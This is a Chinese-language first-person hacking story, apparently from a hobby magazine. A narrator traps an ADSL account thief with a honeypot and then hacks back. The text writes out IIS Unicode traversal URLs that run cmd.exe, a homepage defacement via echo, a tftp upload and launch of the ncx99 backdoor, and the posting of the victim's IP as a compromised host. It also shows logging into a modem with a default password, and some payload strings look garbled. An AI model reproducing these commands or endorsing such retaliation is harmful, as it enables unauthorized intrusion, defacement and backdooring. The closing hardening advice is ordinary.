網絡的高速發展帶動了很多商機， 同時也造出了很多危險因素， 網絡上的賬號被盜事件一直是令網名十分頭痛的事， 這不前幾天鄰居莫沙又跟我談起她家的ADSL帳號被盜事件， 由于是看在MM象我哭訴的份上， 身為BT下載狂人的我， 暗下決定要親自捉住此燎， 以在MM面前提高威信……

　　巧布疑陣

　　星期六通常是我的星期天， 我早早爬起床， 胡亂吃了點東西， 開始布陣， 從網絡上下載了冰河陷井V1.2版來進行硬盤安裝,接下來利用“冰河陷阱”的偽裝功能來誘捕入侵者。 首先我運行冰河陷阱進入到主界面， 接下來在點擊“設置”菜單中的“設置監聽端口”， 然后輸入端口號23,接下來我依次又設置了文件列表生存器,我在文件列表生存器中的“真實目錄”中填入“D:\TEMP\DRIVER_C”完成后,又在“偽裝成驅動器”下拉框中選擇“C:”然后點擊“添加”按鈕將映射關系填入列表,并在“真實目錄”中填入“D:\TEMP\DRIVER_D”接著在“偽裝成驅動器”下拉框中選擇“D:”,然后點擊“添加”按鈕將映射關系填入列表,好了再一次點擊“生成文件”按鈕重新生成DAT目錄下“文件列表.txt”文件.好了一個簡單的冰河陷井技術完工了,由D盤TEMP目錄下的DRIVER_C目錄生成虛擬的C盤文件列表， 由D盤TEMP目錄下的DRIVER_D目錄生成虛擬的D盤文件列表……只要有黑客進行遠程訪問裝好的文件列表.txt 時那么當監控端點擊“文件管理器”中的驅動器或目錄時， “冰河陷阱”自動從該文件中檢索信息， 并發送相應的目錄及文件信息……這下看你如何逃出我滴手心……

　　網內來客

　　八千黑客入沙場， 兵步無車夜瘋狂 …… 此時異地黑客工作室的流氓兔又在用盜來的ADSL帳號瘋狂上網， 上著上著突然掉線， 正在傳奇癮上那容斷線， 流氓兔用盡全身的力氣火速重新連接， 天啊， 連接N次無結果， 看來是被盜的用戶發覺了， 并改寫了密碼……郁悶……抽出一支不帶過濾嘴無名香煙， 溫柔地放在鼻邊輕輕地嗅了嗅！流氓兔習慣性在做壞事前總是要重復這一動作……兩眼在眼眶內做了一次嵌入式掃描后， 一個念頭轉上了眉梢， 重新尋找ADSL帳號并進行入侵， 以備傳奇之需……直奔H盤hack目錄下， 找出黑客工作室的通用工具SUPPERSCAN,該工具掃描速度快， 支持端口掃描與IP轉換， 并可以掃描單個IP端口……流氓兔首先在軟件主界面的port list setup里里選上23號端口， 然后回主界面在IP地址段中輸入219.XXX.XXX.1到219.XXX.XXX.254， 點擊start按紐， 不大一會功夫， 藍色屏幕上刷刷地找到N臺主機來， 一一觀看事， 哈哈招思慕想的23號端口出現了， 流氓兔決定作出進一步的行動， 迅速連接， 在網頁地址中輸入IP地址219.XXX.XXX.XXX網絡就在瞬間彈出一個登陸對話框， 要求輸入用戶名與密碼， 頭略微在流氓兔脖子上轉動了一下， 用老方法ADSL的缺省adsl1234吧， 在彈出的對話框中輸入用戶名ADSL密碼adsl1234， 哈哈， 得來全不費功夫， 進來了進來了！這次居然連弱口令都不用猜， 就看到了他的真實ADSL帳戶與密碼……這次點上剛剛沒抽的煙， 云升一會……迅速用獲得的ADSL帳號上網……

　　收網捕魚

　　就是我漫長的等待過后， 夜深沉……系統托盤中的冰河陷阱圖標不斷閃爍開始報警， 同時還有聲音響起， 啊哈魚兒入網了， 趕塊雙擊圖標打開“冰河陷阱”主界面， 在列表中可以看到入侵者的IP地址、所在地以及登錄密碼和詳細的操作過程……看完這些后我開始追捕行動！

　　打開工具rangescan工具， 輸入入侵者的IP地址， 并在from中填入218.xxx.xxx.xxx to 中填入218.xxx.xxx.xxx在掃描內容框中寫入:/scripts/..%cl%lc../winnt/system32/cmd.exe完成后， 輕輕一擊掃描鍵， 軟件自個開始工作， 而我則開始看電影屏道的大汗天子……天子結束后我回到屏上， 哎呀， 軟件有結果了,趕快確定一下,打開IE在其中輸入http://218.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir回車,哈哈但見頁面還回如下:

　　Directory of c:\inetpub\scripts

　　2000-08-06 19 DIR>.

　　2000-08-06 19 DIR>..

　　0 File(s) 0 bytes

　　2 Dir(s)11,556,635,276 bytes free

　　果然存在此漏洞,那我就利用ECHO回顯命令及管道工具來改一下他的WEB頁面,格式如下:

　　http://218.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot

　　嘿嘿看到他的主頁的存放目錄了,那就修改吧,格式如下:

　　c:\inetpub\wwwroot\default.asp'>http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd".exe?/c+echo+I+love+my+homeland+>c:\inetpub\wwwroot\default.asp

　　哈哈,主頁已修改完成,接下來我得控制他的主機,首先我從網絡上下載了tftpd32.exe和ncx99.exe兩個軟件,并運行tftpd32.exe使本機成為FTP服務器,在IE中輸入命令如下:

　　http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd.exe?/c+tftp -i 127.0.0.1 GET ncx99.exe c:\inetpub\scripts\\hack.exe這時我已完成上傳ncx99.exe到對方主機并改名為hack.exe文件.緊接著我開始在IE中輸入命令來讓hack.exe執行如下:

　　http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\hack.exe

　　good命令成功完成,哈哈接下來我更省事了,可以用遠程telnet來隨時連接他了,小樣,你想安穩地過日子只怕很難咯~于是我將他的IP地址發布在了黑客網站上,肉雞成立……

　　裝備ADSL

　　夜總是在我睡醒后退去……天明打一個電話到莫沙家讓她準備我的早餐， 然后我

　　晃晃悠悠地起身前去……莫沙的計算機前坐定， 開始從計算機里配置ADSL內設的防火墻點擊開始菜單—程序—管理工具—服務—Firewall， 這時就打開了ADSL的界面， 我們先看一下ADSL MODEM的全部功能如下：

　　blacklist status黑名單狀態

　　blacklist period(min)在規定的時間內指定計算機的IP地址會處在黑名單狀態下

　　Attack protection 選中Enable可以啟用adsl內建的防火墻

　　Dos protection選中Enable可以啟用syn Dos、icmp Dos和per-host Dos服務性保護

　　Max Half open Tcp conn設定不完全開放狀態， 當前IP開放的百分數。

　　Max ICMP Com 為管理ICMP設定當前使用的連接數量的百分數。

　　Max Single Host Conn設定單獨一臺計算機能使用當前IP連接的百分數。

　　Log Destination記錄防火墻事件。

　　E-mail ID of Admin 1/2/3指安管理員的電子郵箱地址。

　　我先在Attack protection 選中Enable可以啟用adsl內建的防火墻， 并在Dos protection中選擇Enable開啟服務性保護， 同時選中Max Half open Tcp conn設定不完全開放狀態， 與此同時啟用Max ICMP Com 為管理ICMP設定當前使用的連接數量的百分數。 這樣如果百分數超標， 那么這個不完全開放連接將會被關閉， 新的連接將取而代之， 并開始傳輸數據， 最后啟用Log Destination記錄防火墻事件。 這樣一但發現新情況， 記錄的事件將會發送給指定的管理員與有關部門！

　　徹底防衛ADSL

　　鄰居莫沙看了我設置完這些后還是覺得心里沒底， 硬是要我再好好想想有沒有更好的辦法， 并提出請我喝茶， 我眼神一亮……好吧， 難得有MM如此熱情， 我就幫他提高系統安全性吧！

　　首先我在寬帶設置中用代理獵手工具找到一個代理服務器， 隱藏了本機真實的IP地址， 接著我又從TCP/IP中進入到高級TCP/IP設置， 在其選項菜單中選擇TCP/IP篩選屬性,從中關閉了本機不常用的端口， 只留下80端口， 并更換了管理員的帳戶與密碼， 從注冊表中刪除了GUEST帳戶， 將TCP/IP協議的NRTBIOS關閉， 并進入注冊表HKEY_CURRENT_USER\SOftware\Microsoft\windows\Curr-entversion\policies\network主鍵下新建DWOED類型鍵值名為NoFileSharing-Contro1從而達到不讓更改網絡的文件和打印機共享功能， 以社絕黑客通過此門進入， 然后我又禁止了建立空連接， 只要將本地的安全策略設為不允許SAM賬戶和共享的匿名連接， 接下來我關閉了IP安全設置中的Activex控件與java禁用。 最后我給系統打上了新補丁程序， 并安裝了防火墻……　設完后， 我氣定神閑地看著莫沙， 莫沙抬頭望了望我又望了望天……天氣不錯……愣是壓根閉口不提喝茶的事……